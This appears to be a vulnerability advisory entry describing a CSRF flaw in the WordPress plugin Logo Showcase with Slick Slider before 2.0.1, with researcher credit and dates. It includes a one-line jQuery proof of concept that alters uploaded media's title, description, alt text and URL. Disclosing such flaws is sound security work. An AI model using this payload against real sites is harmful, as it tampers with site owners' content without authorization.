WordPress Plugin Vulnerabilities
Logo Showcase with Slick Slider < 2.0.1 - Arbitrary Media Title/Description/Alt Text/URL Update via CSRF
Description
The plugin does not have CSRF check in the lswss_save_attachment_data AJAX action, allowing attackers to make a logged in high privilege user, change title, description, alt text, and URL of arbitrary uploaded media.
Proof of Concept
jQuery.post(ajaxurl,{ action: "lswss_save_attachment_data", attachment_id: 564, form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20via%20CSRF&lswss_attachment_alt=Alt%20text&lswss_attachment_link=" })
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-01-31 (about 2 years ago)
Added
2022-01-31 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)